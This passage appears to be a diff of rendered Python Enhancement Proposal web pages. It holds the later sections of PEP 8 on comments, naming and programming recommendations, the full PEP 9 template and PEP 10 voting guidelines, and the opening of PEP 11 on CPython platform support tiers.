Block comments generally consist of one or more paragraphs built out of +complete sentences, with each sentence ending in a period.

+

You should use one or two spaces after a sentence-ending period in +multi-sentence comments, except after the final sentence.

+

Ensure that your comments are clear and easily understandable to other +speakers of the language you are writing in.

+

Python coders from non-English speaking countries: please write your +comments in English, unless you are 120% sure that the code will never +be read by people who don’t speak your language.

+
+

Block Comments

+

Block comments generally apply to some (or all) code that follows +them, and are indented to the same level as that code. Each line of a +block comment starts with a # and a single space (unless it is +indented text inside the comment).

+

Paragraphs inside a block comment are separated by a line containing a +single #.

+
+
+

Inline Comments

+

Use inline comments sparingly.

+

An inline comment is a comment on the same line as a statement. +Inline comments should be separated by at least two spaces from the +statement. They should start with a # and a single space.

+

Inline comments are unnecessary and in fact distracting if they state +the obvious. Don’t do this:

+
x = x + 1                 # Increment x
+
+
+

But sometimes, this is useful:

+
x = x + 1                 # Compensate for border
+
+
+
+
+

Documentation Strings

+

Conventions for writing good documentation strings +(a.k.a. “docstrings”) are immortalized in PEP 257.

+
    +
  • Write docstrings for all public modules, functions, classes, and +methods. Docstrings are not necessary for non-public methods, but +you should have a comment that describes what the method does. This +comment should appear after the def line.
  • +
  • PEP 257 describes good docstring conventions. Note that most +importantly, the """ that ends a multiline docstring should be +on a line by itself:
    """Return a foobang
    +
    +Optional plotz says to frobnicate the bizbaz first.
    +"""
    +
    +
    +
  • +
  • For one liner docstrings, please keep the closing """ on +the same line:
    """Return an ex-parrot."""
    +
    +
    +
  • +
+
+
+
+

Naming Conventions

+

The naming conventions of Python’s library are a bit of a mess, so +we’ll never get this completely consistent – nevertheless, here are +the currently recommended naming standards. New modules and packages +(including third party frameworks) should be written to these +standards, but where an existing library has a different style, +internal consistency is preferred.

+
+

Overriding Principle

+

Names that are visible to the user as public parts of the API should +follow conventions that reflect usage rather than implementation.

+
+
+

Descriptive: Naming Styles

+

There are a lot of different naming styles. It helps to be able to +recognize what naming style is being used, independently from what +they are used for.

+

The following naming styles are commonly distinguished:

+
    +
  • b (single lowercase letter)
  • +
  • B (single uppercase letter)
  • +
  • lowercase
  • +
  • lower_case_with_underscores
  • +
  • UPPERCASE
  • +
  • UPPER_CASE_WITH_UNDERSCORES
  • +
  • CapitalizedWords (or CapWords, or CamelCase – so named because +of the bumpy look of its letters [4]). This is also sometimes known +as StudlyCaps.

    Note: When using acronyms in CapWords, capitalize all the +letters of the acronym. Thus HTTPServerError is better than +HttpServerError.

    +
  • +
  • mixedCase (differs from CapitalizedWords by initial lowercase +character!)
  • +
  • Capitalized_Words_With_Underscores (ugly!)
  • +
+

There’s also the style of using a short unique prefix to group related +names together. This is not used much in Python, but it is mentioned +for completeness. For example, the os.stat() function returns a +tuple whose items traditionally have names like st_mode, +st_size, st_mtime and so on. (This is done to emphasize the +correspondence with the fields of the POSIX system call struct, which +helps programmers familiar with that.)

+

The X11 library uses a leading X for all its public functions. In +Python, this style is generally deemed unnecessary because attribute +and method names are prefixed with an object, and function names are +prefixed with a module name.

+

In addition, the following special forms using leading or trailing +underscores are recognized (these can generally be combined with any +case convention):

+
    +
  • _single_leading_underscore: weak “internal use” indicator. +E.g. from M import * does not import objects whose names start +with an underscore.
  • +
  • single_trailing_underscore_: used by convention to avoid +conflicts with Python keyword, e.g. :
    tkinter.Toplevel(master, class_='ClassName')
    +
    +
    +
  • +
  • __double_leading_underscore: when naming a class attribute, +invokes name mangling (inside class FooBar, __boo becomes +_FooBar__boo; see below).
  • +
  • __double_leading_and_trailing_underscore__: “magic” objects or +attributes that live in user-controlled namespaces. +E.g. __init__, __import__ or __file__. Never invent +such names; only use them as documented.
  • +
+
+
+

Prescriptive: Naming Conventions

+
+

Names to Avoid

+

Never use the characters ‘l’ (lowercase letter el), ‘O’ (uppercase +letter oh), or ‘I’ (uppercase letter eye) as single character variable +names.

+

In some fonts, these characters are indistinguishable from the +numerals one and zero. When tempted to use ‘l’, use ‘L’ instead.

+
+
+

ASCII Compatibility

+

Identifiers used in the standard library must be ASCII compatible +as described in the +policy section +of PEP 3131.

+
+
+

Package and Module Names

+

Modules should have short, all-lowercase names. Underscores can be +used in the module name if it improves readability. Python packages +should also have short, all-lowercase names, although the use of +underscores is discouraged.

+

When an extension module written in C or C++ has an accompanying +Python module that provides a higher level (e.g. more object oriented) +interface, the C/C++ module has a leading underscore +(e.g. _socket).

+
+
+

Class Names

+

Class names should normally use the CapWords convention.

+

The naming convention for functions may be used instead in cases where +the interface is documented and used primarily as a callable.

+

Note that there is a separate convention for builtin names: most builtin +names are single words (or two words run together), with the CapWords +convention used only for exception names and builtin constants.

+
+
+

Type Variable Names

+

Names of type variables introduced in PEP 484 should normally use CapWords +preferring short names: T, AnyStr, Num. It is recommended to add +suffixes _co or _contra to the variables used to declare covariant +or contravariant behavior correspondingly:

+
from typing import TypeVar
+
+VT_co = TypeVar('VT_co', covariant=True)
+KT_contra = TypeVar('KT_contra', contravariant=True)
+
+
+
+
+

Exception Names

+

Because exceptions should be classes, the class naming convention +applies here. However, you should use the suffix “Error” on your +exception names (if the exception actually is an error).

+
+
+

Global Variable Names

+

(Let’s hope that these variables are meant for use inside one module +only.) The conventions are about the same as those for functions.

+

Modules that are designed for use via from M import * should use +the __all__ mechanism to prevent exporting globals, or use the +older convention of prefixing such globals with an underscore (which +you might want to do to indicate these globals are “module +non-public”).

+
+
+

Function and Variable Names

+

Function names should be lowercase, with words separated by +underscores as necessary to improve readability.

+

Variable names follow the same convention as function names.

+

mixedCase is allowed only in contexts where that’s already the +prevailing style (e.g. threading.py), to retain backwards +compatibility.

+
+
+

Function and Method Arguments

+

Always use self for the first argument to instance methods.

+

Always use cls for the first argument to class methods.

+

If a function argument’s name clashes with a reserved keyword, it is +generally better to append a single trailing underscore rather than +use an abbreviation or spelling corruption. Thus class_ is better +than clss. (Perhaps better is to avoid such clashes by using a +synonym.)

+
+
+

Method Names and Instance Variables

+

Use the function naming rules: lowercase with words separated by +underscores as necessary to improve readability.

+

Use one leading underscore only for non-public methods and instance +variables.

+

To avoid name clashes with subclasses, use two leading underscores to +invoke Python’s name mangling rules.

+

Python mangles these names with the class name: if class Foo has an +attribute named __a, it cannot be accessed by Foo.__a. (An +insistent user could still gain access by calling Foo._Foo__a.) +Generally, double leading underscores should be used only to avoid +name conflicts with attributes in classes designed to be subclassed.

+

Note: there is some controversy about the use of __names (see below).

+
+
+

Constants

+

Constants are usually defined on a module level and written in all +capital letters with underscores separating words. Examples include +MAX_OVERFLOW and TOTAL.

+
+
+

Designing for Inheritance

+

Always decide whether a class’s methods and instance variables +(collectively: “attributes”) should be public or non-public. If in +doubt, choose non-public; it’s easier to make it public later than to +make a public attribute non-public.

+

Public attributes are those that you expect unrelated clients of your +class to use, with your commitment to avoid backwards incompatible +changes. Non-public attributes are those that are not intended to be +used by third parties; you make no guarantees that non-public +attributes won’t change or even be removed.

+

We don’t use the term “private” here, since no attribute is really +private in Python (without a generally unnecessary amount of work).

+

Another category of attributes are those that are part of the +“subclass API” (often called “protected” in other languages). Some +classes are designed to be inherited from, either to extend or modify +aspects of the class’s behavior. When designing such a class, take +care to make explicit decisions about which attributes are public, +which are part of the subclass API, and which are truly only to be +used by your base class.

+

With this in mind, here are the Pythonic guidelines:

+
    +
  • Public attributes should have no leading underscores.
  • +
  • If your public attribute name collides with a reserved keyword, +append a single trailing underscore to your attribute name. This is +preferable to an abbreviation or corrupted spelling. (However, +notwithstanding this rule, ‘cls’ is the preferred spelling for any +variable or argument which is known to be a class, especially the +first argument to a class method.)

    Note 1: See the argument name recommendation above for class methods.

    +
  • +
  • For simple public data attributes, it is best to expose just the +attribute name, without complicated accessor/mutator methods. Keep +in mind that Python provides an easy path to future enhancement, +should you find that a simple data attribute needs to grow +functional behavior. In that case, use properties to hide +functional implementation behind simple data attribute access +syntax.

    Note 1: Try to keep the functional behavior side-effect free, +although side-effects such as caching are generally fine.

    +

    Note 2: Avoid using properties for computationally expensive +operations; the attribute notation makes the caller believe that +access is (relatively) cheap.

    +
  • +
  • If your class is intended to be subclassed, and you have attributes +that you do not want subclasses to use, consider naming them with +double leading underscores and no trailing underscores. This +invokes Python’s name mangling algorithm, where the name of the +class is mangled into the attribute name. This helps avoid +attribute name collisions should subclasses inadvertently contain +attributes with the same name.

    Note 1: Note that only the simple class name is used in the mangled +name, so if a subclass chooses both the same class name and attribute +name, you can still get name collisions.

    +

    Note 2: Name mangling can make certain uses, such as debugging and +__getattr__(), less convenient. However the name mangling +algorithm is well documented and easy to perform manually.

    +

    Note 3: Not everyone likes name mangling. Try to balance the +need to avoid accidental name clashes with potential use by +advanced callers.

    +
  • +
+
+
+
+

Public and Internal Interfaces

+

Any backwards compatibility guarantees apply only to public interfaces. +Accordingly, it is important that users be able to clearly distinguish +between public and internal interfaces.

+

Documented interfaces are considered public, unless the documentation +explicitly declares them to be provisional or internal interfaces exempt +from the usual backwards compatibility guarantees. All undocumented +interfaces should be assumed to be internal.

+

To better support introspection, modules should explicitly declare the +names in their public API using the __all__ attribute. Setting +__all__ to an empty list indicates that the module has no public API.

+

Even with __all__ set appropriately, internal interfaces (packages, +modules, classes, functions, attributes or other names) should still be +prefixed with a single leading underscore.

+

An interface is also considered internal if any containing namespace +(package, module or class) is considered internal.

+

Imported names should always be considered an implementation detail. +Other modules must not rely on indirect access to such imported names +unless they are an explicitly documented part of the containing module’s +API, such as os.path or a package’s __init__ module that exposes +functionality from submodules.

+
+
+
+

Programming Recommendations

+
    +
  • Code should be written in a way that does not disadvantage other +implementations of Python (PyPy, Jython, IronPython, Cython, Psyco, +and such).

    For example, do not rely on CPython’s efficient implementation of +in-place string concatenation for statements in the form a += b +or a = a + b. This optimization is fragile even in CPython (it +only works for some types) and isn’t present at all in implementations +that don’t use refcounting. In performance sensitive parts of the +library, the ''.join() form should be used instead. This will +ensure that concatenation occurs in linear time across various +implementations.

    +
  • +
  • Comparisons to singletons like None should always be done with +is or is not, never the equality operators.

    Also, beware of writing if x when you really mean if x is not +None – e.g. when testing whether a variable or argument that +defaults to None was set to some other value. The other value might +have a type (such as a container) that could be false in a boolean +context!

    +
  • +
  • Use is not operator rather than not ... is. While both +expressions are functionally identical, the former is more readable +and preferred:
    # Correct:
    +if foo is not None:
    +
    +
    +
    # Wrong:
    +if not foo is None:
    +
    +
    +
  • +
  • When implementing ordering operations with rich comparisons, it is +best to implement all six operations (__eq__, __ne__, +__lt__, __le__, __gt__, __ge__) rather than relying +on other code to only exercise a particular comparison.

    To minimize the effort involved, the functools.total_ordering() +decorator provides a tool to generate missing comparison methods.

    +

    PEP 207 indicates that reflexivity rules are assumed by Python. +Thus, the interpreter may swap y > x with x < y, y >= x +with x <= y, and may swap the arguments of x == y and x != +y. The sort() and min() operations are guaranteed to use +the < operator and the max() function uses the > +operator. However, it is best to implement all six operations so +that confusion doesn’t arise in other contexts.

    +
  • +
  • Always use a def statement instead of an assignment statement that binds +a lambda expression directly to an identifier:
    # Correct:
    +def f(x): return 2*x
    +
    +
    +
    # Wrong:
    +f = lambda x: 2*x
    +
    +
    +

    The first form means that the name of the resulting function object is +specifically ‘f’ instead of the generic ‘<lambda>’. This is more +useful for tracebacks and string representations in general. The use +of the assignment statement eliminates the sole benefit a lambda +expression can offer over an explicit def statement (i.e. that it can +be embedded inside a larger expression)

    +
  • +
  • Derive exceptions from Exception rather than BaseException. +Direct inheritance from BaseException is reserved for exceptions +where catching them is almost always the wrong thing to do.

    Design exception hierarchies based on the distinctions that code +catching the exceptions is likely to need, rather than the locations +where the exceptions are raised. Aim to answer the question +“What went wrong?” programmatically, rather than only stating that +“A problem occurred” (see PEP 3151 for an example of this lesson being +learned for the builtin exception hierarchy)

    +

    Class naming conventions apply here, although you should add the +suffix “Error” to your exception classes if the exception is an +error. Non-error exceptions that are used for non-local flow control +or other forms of signaling need no special suffix.

    +
  • +
  • Use exception chaining appropriately. raise X from Y +should be used to indicate explicit replacement without losing the +original traceback.

    When deliberately replacing an inner exception (using raise X from +None), ensure that relevant details are transferred to the new +exception (such as preserving the attribute name when converting +KeyError to AttributeError, or embedding the text of the original +exception in the new exception message).

    +
  • +
  • When catching exceptions, mention specific exceptions whenever +possible instead of using a bare except: clause:
    try:
    +    import platform_specific_module
    +except ImportError:
    +    platform_specific_module = None
    +
    +
    +

    A bare except: clause will catch SystemExit and +KeyboardInterrupt exceptions, making it harder to interrupt a +program with Control-C, and can disguise other problems. If you +want to catch all exceptions that signal program errors, use +except Exception: (bare except is equivalent to except +BaseException:).

    +

    A good rule of thumb is to limit use of bare ‘except’ clauses to two +cases:

    +
      +
    1. If the exception handler will be printing out or logging the +traceback; at least the user will be aware that an error has +occurred.
    2. +
    3. If the code needs to do some cleanup work, but then lets the +exception propagate upwards with raise. try...finally +can be a better way to handle this case.
    4. +
    +
  • +
  • When catching operating system errors, prefer the explicit exception +hierarchy introduced in Python 3.3 over introspection of errno +values.
  • +
  • Additionally, for all try/except clauses, limit the try clause +to the absolute minimum amount of code necessary. Again, this +avoids masking bugs:
    # Correct:
    +try:
    +    value = collection[key]
    +except KeyError:
    +    return key_not_found(key)
    +else:
    +    return handle_value(value)
    +
    +
    +
    # Wrong:
    +try:
    +    # Too broad!
    +    return handle_value(collection[key])
    +except KeyError:
    +    # Will also catch KeyError raised by handle_value()
    +    return key_not_found(key)
    +
    +
    +
  • +
  • When a resource is local to a particular section of code, use a +with statement to ensure it is cleaned up promptly and reliably +after use. A try/finally statement is also acceptable.
  • +
  • Context managers should be invoked through separate functions or methods +whenever they do something other than acquire and release resources:
    # Correct:
    +with conn.begin_transaction():
    +    do_stuff_in_transaction(conn)
    +
    +
    +
    # Wrong:
    +with conn:
    +    do_stuff_in_transaction(conn)
    +
    +
    +

    The latter example doesn’t provide any information to indicate that +the __enter__ and __exit__ methods are doing something other +than closing the connection after a transaction. Being explicit is +important in this case.

    +
  • +
  • Be consistent in return statements. Either all return statements in +a function should return an expression, or none of them should. If +any return statement returns an expression, any return statements +where no value is returned should explicitly state this as return +None, and an explicit return statement should be present at the +end of the function (if reachable):
    # Correct:
    +
    +def foo(x):
    +    if x >= 0:
    +        return math.sqrt(x)
    +    else:
    +        return None
    +
    +def bar(x):
    +    if x < 0:
    +        return None
    +    return math.sqrt(x)
    +
    +
    +
    # Wrong:
    +
    +def foo(x):
    +    if x >= 0:
    +        return math.sqrt(x)
    +
    +def bar(x):
    +    if x < 0:
    +        return
    +    return math.sqrt(x)
    +
    +
    +
  • +
  • Use ''.startswith() and ''.endswith() instead of string +slicing to check for prefixes or suffixes.

    startswith() and endswith() are cleaner and less error prone:

    +
    # Correct:
    +if foo.startswith('bar'):
    +
    +
    +
    # Wrong:
    +if foo[:3] == 'bar':
    +
    +
    +
  • +
  • Object type comparisons should always use isinstance() instead of +comparing types directly:
    # Correct:
    +if isinstance(obj, int):
    +
    +
    +
    # Wrong:
    +if type(obj) is type(1):
    +
    +
    +
  • +
  • For sequences, (strings, lists, tuples), use the fact that empty +sequences are false:
    # Correct:
    +if not seq:
    +if seq:
    +
    +
    +
    # Wrong:
    +if len(seq):
    +if not len(seq):
    +
    +
    +
  • +
  • Don’t write string literals that rely on significant trailing +whitespace. Such trailing whitespace is visually indistinguishable +and some editors (or more recently, reindent.py) will trim them.
  • +
  • Don’t compare boolean values to True or False using ==:
    # Correct:
    +if greeting:
    +
    +
    +
    # Wrong:
    +if greeting == True:
    +
    +
    +

    Worse:

    +
    # Wrong:
    +if greeting is True:
    +
    +
    +
  • +
  • Use of the flow control statements return/break/continue +within the finally suite of a try...finally, where the flow control +statement would jump outside the finally suite, is discouraged. This +is because such statements will implicitly cancel any active exception +that is propagating through the finally suite:
    # Wrong:
    +def foo():
    +    try:
    +        1 / 0
    +    finally:
    +        return 42
    +
    +
    +
  • +
+
+

Function Annotations

+

With the acceptance of PEP 484, the style rules for function +annotations have changed.

+
    +
  • Function annotations should use PEP 484 syntax (there are some +formatting recommendations for annotations in the previous section).
  • +
  • The experimentation with annotation styles that was recommended +previously in this PEP is no longer encouraged.
  • +
  • However, outside the stdlib, experiments within the rules of PEP 484 +are now encouraged. For example, marking up a large third party +library or application with PEP 484 style type annotations, +reviewing how easy it was to add those annotations, and observing +whether their presence increases code understandability.
  • +
  • The Python standard library should be conservative in adopting such +annotations, but their use is allowed for new code and for big +refactorings.
  • +
  • For code that wants to make a different use of function annotations +it is recommended to put a comment of the form:
    # type: ignore
    +
    +
    +

    near the top of the file; this tells type checkers to ignore all +annotations. (More fine-grained ways of disabling complaints from +type checkers can be found in PEP 484.)

    +
  • +
  • Like linters, type checkers are optional, separate tools. Python +interpreters by default should not issue any messages due to type +checking and should not alter their behavior based on annotations.
  • +
  • Users who don’t want to use type checkers are free to ignore them. +However, it is expected that users of third party library packages +may want to run type checkers over those packages. For this purpose +PEP 484 recommends the use of stub files: .pyi files that are read +by the type checker in preference of the corresponding .py files. +Stub files can be distributed with a library, or separately (with +the library author’s permission) through the typeshed repo [5].
  • +
+
+
+

Variable Annotations

+

PEP 526 introduced variable annotations. The style recommendations for them are +similar to those on function annotations described above:

+
    +
  • Annotations for module level variables, class and instance variables, +and local variables should have a single space after the colon.
  • +
  • There should be no space before the colon.
  • +
  • If an assignment has a right hand side, then the equality sign should have +exactly one space on both sides:
    # Correct:
    +
    +code: int
    +
    +class Point:
    +    coords: Tuple[int, int]
    +    label: str = '<unknown>'
    +
    +
    +
    # Wrong:
    +
    +code:int  # No space after colon
    +code : int  # Space before colon
    +
    +class Test:
    +    result: int=0  # No spaces around equality sign
    +
    +
    +
  • +
  • Although the PEP 526 is accepted for Python 3.6, the variable annotation +syntax is the preferred syntax for stub files on all versions of Python +(see PEP 484 for details).
  • +
+

Footnotes

+ +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0008.rst

+

Last modified: 2024-09-09 14:02:27 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0009/index.html b/pep-0009/index.html new file mode 100644 index 00000000000..d54a353077a --- /dev/null +++ b/pep-0009/index.html @@ -0,0 +1,334 @@ + + + + + + + + PEP 9 – Sample Plaintext PEP Template | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 9 – Sample Plaintext PEP Template

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
14-Aug-2001
+
Post-History:
+

+
Resolution:
+
Python-Dev thread
+
+
+
+

Important

+

This PEP has been withdrawn.

+

×

+

As of 05-Jan-2016, this PEP is officially deprecated and replaced +by PEP 12. All PEPs should now use the reStructuredText format +described by PEP 12, and plaintext PEPs will no longer be +accepted.

+

+
+
Abstract
+
+    This PEP provides a boilerplate or sample template for creating
+    your own plaintext PEPs.  In conjunction with the content
+    guidelines in PEP 1 [1], this should make it easy for you to
+    conform your own PEPs to the format outlined below.
+
+    Note: if you are reading this PEP via the web, you should first
+    grab the plaintext source of this PEP in order to complete the
+    steps below.  DO NOT USE THE HTML FILE AS YOUR TEMPLATE!
+
+    To get the source this (or any) PEP, look at the top of the HTML
+    page and click on the date & time on the "Last-Modified" line.  It
+    is a link to the source text in the Python repository.
+
+    If you would prefer to use lightweight markup in your PEP, please
+    see PEP 12, "Sample reStructuredText PEP Template" [2].
+
+
+Rationale
+
+    PEP submissions come in a wide variety of forms, not all adhering
+    to the format guidelines set forth below.  Use this template, in
+    conjunction with the content guidelines in PEP 1, to ensure that
+    your PEP submission won't get automatically rejected because of
+    form.
+
+
+How to Use This Template
+
+    To use this template you must first decide whether your PEP is
+    going to be an Informational or Standards Track PEP.  Most PEPs
+    are Standards Track because they propose a new feature for the
+    Python language or standard library.  When in doubt, read PEP 1
+    for details or contact the PEP editors <peps@python.org>.
+
+    Once you've decided which type of PEP yours is going to be, follow
+    the directions below.
+
+    - Make a copy of this file (.txt file, not HTML!) and perform the
+      following edits.
+
+    - Replace the "PEP: 9" header with "PEP: XXX" since you don't yet
+      have a PEP number assignment.
+
+    - Change the Title header to the title of your PEP.
+
+    - Leave the Version and Last-Modified headers alone; we'll take
+      care of those when we check your PEP into Python's Subversion
+      repository.  These headers consist of keywords ("Revision" and
+      "Date" enclosed in "$"-signs) which are automatically expanded
+      by the repository.  Please do not edit the expanded date or
+      revision text.
+
+    - Change the Author header to include your name, and optionally
+      your email address.  Be sure to follow the format carefully:
+      your name must appear first, and it must not be contained in
+      parentheses.  Your email address may appear second (or it can be
+      omitted) and if it appears, it must appear in angle brackets.
+      It is okay to obfuscate your email address.
+
+    - If there is a mailing list for discussion of your new feature,
+      add a Discussions-To header right after the Author header.  You
+      should not add a Discussions-To header if the mailing list to be
+      used is either python-list@python.org or python-dev@python.org,
+      or if discussions should be sent to you directly.  Most
+      Informational PEPs don't have a Discussions-To header.
+
+    - Change the Status header to "Draft".
+
+    - For Standards Track PEPs, change the Type header to "Standards
+      Track".
+
+    - For Informational PEPs, change the Type header to
+      "Informational".
+
+    - For Standards Track PEPs, if your feature depends on the
+      acceptance of some other currently in-development PEP, add a
+      Requires header right after the Type header.  The value should
+      be the PEP number of the PEP yours depends on.  Don't add this
+      header if your dependent feature is described in a Final PEP.
+
+    - Change the Created header to today's date.  Be sure to follow
+      the format carefully: it must be in dd-mmm-yyyy format, where
+      the mmm is the 3 English letter month abbreviation, e.g. one of
+      Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec.
+
+    - For Standards Track PEPs, after the Created header, add a
+      Python-Version header and set the value to the next planned
+      version of Python, i.e. the one your new feature will hopefully
+      make its first appearance in.  Do not use an alpha or beta
+      release designation here.  Thus, if the last version of Python
+      was 2.2 alpha 1 and you're hoping to get your new feature into
+      Python 2.2, set the header to:
+
+      Python-Version: 2.2
+
+    - Leave Post-History alone for now; you'll add dates to this
+      header each time you post your PEP to python-list@python.org or
+      python-dev@python.org.  E.g. if you posted your PEP to the lists
+      on August 14, 2001 and September 3, 2001, the Post-History
+      header would look like:
+
+      Post-History: 14-Aug-2001, 03-Sept-2001
+
+      You must manually add new dates and check them in.  If you don't
+      have check-in privileges, send your changes to the PEP editor.
+
+    - Add a Replaces header if your PEP obsoletes an earlier PEP.  The
+      value of this header is the number of the PEP that your new PEP
+      is replacing.  Only add this header if the older PEP is in
+      "final" form, i.e. is either Accepted, Final, or Rejected.  You
+      aren't replacing an older open PEP if you're submitting a
+      competing idea.
+
+    - Now write your Abstract, Rationale, and other content for your
+      PEP, replacing all this gobbledygook with your own text. Be sure
+      to adhere to the format guidelines below, specifically on the
+      prohibition of tab characters and the indentation requirements.
+
+    - Update your References and Copyright section.  Usually you'll
+      place your PEP into the public domain, in which case just leave
+      the "Copyright" section alone.  Alternatively, you can use the
+      Open Publication License[3], but public domain is still strongly
+      preferred.
+
+    - Leave the little Emacs turd at the end of this file alone,
+      including the formfeed character ("^L", or \f).
+
+    - Send your PEP submission to the PEP editors (peps@python.org),
+      along with $100k in unmarked pennies.  (Just kidding, I wanted
+      to see if you were still awake. :)
+
+
+Plaintext PEP Formatting Requirements
+
+    PEP headings must begin in column zero and the initial letter of
+    each word must be capitalized as in book titles.  Acronyms should
+    be in all capitals.  The body of each section must be indented 4
+    spaces.  Code samples inside body sections should be indented a
+    further 4 spaces, and other indentation can be used as required to
+    make the text readable.  You must use two blank lines between the
+    last line of a section's body and the next section heading.
+
+    You must adhere to the Emacs convention of adding two spaces at
+    the end of every sentence.  You should fill your paragraphs to
+    column 70, but under no circumstances should your lines extend
+    past column 79.  If your code samples spill over column 79, you
+    should rewrite them.
+
+    Tab characters must never appear in the document at all.  A PEP
+    should include the standard Emacs stanza included by example at
+    the bottom of this PEP.
+
+    When referencing an external web page in the body of a PEP, you
+    should include the title of the page in the text, with a
+    footnote reference to the URL.  Do not include the URL in the body
+    text of the PEP.  E.g.
+
+        Refer to the Python Language web site [1] for more details.
+        ...
+        [1] http://www.python.org
+
+    When referring to another PEP, include the PEP number in the body
+    text, such as "PEP 1".  The title may optionally appear.  Add a
+    footnote reference, a number in square brackets.  The footnote
+    body should include the PEP's title and author.  It may optionally
+    include the explicit URL on a separate line, but only in the
+    References section.  Note that the pep2html.py script will
+    calculate URLs automatically.  For example:
+
+            ...
+            Refer to PEP 1 [7] for more information about PEP style
+            ...
+
+        References
+
+            [7] PEP 1, PEP Purpose and Guidelines, Warsaw, Hylton
+                http://peps.python.org/pep-0001/
+
+    If you decide to provide an explicit URL for a PEP, please use
+    this as the URL template:
+
+        http://peps.python.org/pep-xxxx/
+
+    PEP numbers in URLs must be padded with zeros from the left, so as
+    to be exactly 4 characters wide, however PEP numbers in the text
+    are never padded.
+
+
+References
+
+    [1] PEP 1, PEP Purpose and Guidelines, Warsaw, Hylton
+        http://peps.python.org/pep-0001/
+
+    [2] PEP 12, Sample reStructuredText PEP Template, Goodger, Warsaw
+        http://peps.python.org/pep-0012/
+
+    [3] http://www.opencontent.org/openpub/
+
+
+
+Copyright
+
+    This document has been placed in the public domain.
+
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0009.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0010/index.html b/pep-0010/index.html new file mode 100644 index 00000000000..5bf9ced5fa2 --- /dev/null +++ b/pep-0010/index.html @@ -0,0 +1,184 @@ + + + + + + + + PEP 10 – Voting Guidelines | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 10 – Voting Guidelines

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
07-Mar-2002
+
Post-History:
+
07-Mar-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines the python-dev voting guidelines. These guidelines +serve to provide feedback or gauge the “wind direction” on a +particular proposal, idea, or feature. They don’t have a binding +force.

+
+
+

Rationale

+

When a new idea, feature, patch, etc. is floated in the Python +community, either through a PEP or on the mailing lists (most likely +on python-dev [1]), it is sometimes helpful to gauge the community’s +general sentiment. Sometimes people just want to register their +opinion of an idea. Sometimes the BDFL wants to take a straw poll. +Whatever the reason, these guidelines have been adopted so as to +provide a common language for developers.

+

While opinions are (sometimes) useful, but they are never binding. +Opinions that are accompanied by rationales are always valued higher +than bare scores (this is especially true with -1 votes).

+
+
+

Voting Scores

+

The scoring guidelines are loosely derived from the Apache voting +procedure [2], with of course our own spin on things. There are 4 +possible vote scores:

+
    +
  • +1 I like it
  • +
  • +0 I don’t care, but go ahead
  • +
  • -0 I don’t care, so why bother?
  • +
  • -1 I hate it
  • +
+

You may occasionally see wild flashes of enthusiasm (either for or +against) with vote scores like +2, +1000, or -1000. These aren’t +really valued much beyond the above scores, but it’s nice to see +people get excited about such geeky stuff.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0010.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0011/index.html b/pep-0011/index.html new file mode 100644 index 00000000000..161dd131767 --- /dev/null +++ b/pep-0011/index.html @@ -0,0 +1,632 @@ + + + + + + + + PEP 11 – CPython platform support | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 11 – CPython platform support

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>, +Brett Cannon <brett at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
07-Jul-2002
+
Post-History:
+
18-Aug-2007, +14-May-2014, +20-Feb-2015, +10-Mar-2022
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP documents how an operating system (platform) becomes +supported in CPython, what platforms are currently supported, and +documents past support.

+
+
+

Rationale

+

Over time, the CPython source code has collected various pieces of +platform-specific code, which, at some point in time, was +considered necessary to use CPython on a specific platform. +Without access to this platform, it is not possible to determine +whether this code is still needed. As a result, this code may +either break during CPython’s evolution, or it may become +unnecessary as the platforms evolve as well.

+

Allowing these fragments to grow poses the risk of +unmaintainability: without having experts for a large number of +platforms, it is not possible to determine whether a certain +change to the CPython source code will work on all supported +platforms.

+

To reduce this risk, this PEP specifies what is required for a +platform to be considered supported by CPython as well as providing a +procedure to remove code for platforms with few or no CPython +users.

+

This PEP also lists what platforms are supported by the CPython +interpreter. This lets people know what platforms are directly +supported by the CPython development team.

+
+
+

Support tiers

+

Platform support is broken down into tiers. Each tier comes with +different requirements which lead to different promises being made +about support.

+

To be promoted to a tier, steering council support is required and is +expected to be driven by team consensus. Demotion to a lower tier +occurs when the requirements of the current tier are no longer met for +a platform for an extended period of time based on the judgment of +the release manager or steering council. For platforms which no longer +meet the requirements of any tier by b1 of a new feature release, an +announcement will be made to warn the community of the pending removal +of support for the platform (e.g. in the b1 announcement). If the +platform is not brought into line for at least one of the tiers by the +first release candidate, it will be listed as unsupported in this PEP.

+
+

Tier 1

+
    +
  • STATUS
  • +
  • CI failures block releases.
  • +
  • Changes which would break the main branch are not allowed to be merged; +any breakage should be fixed or reverted immediately.
  • +
  • All core developers are responsible to keep main, and thus these +platforms, working.
  • +
  • Failures on these platforms block a release.
  • +
+ + + + + + + + + + + + + + + + + + + + + + + +
Target TripleNotes
aarch64-apple-darwinclang
i686-pc-windows-msvc
x86_64-pc-windows-msvc
x86_64-apple-darwinBSD libc, clang
x86_64-unknown-linux-gnuglibc, gcc
+
+
+

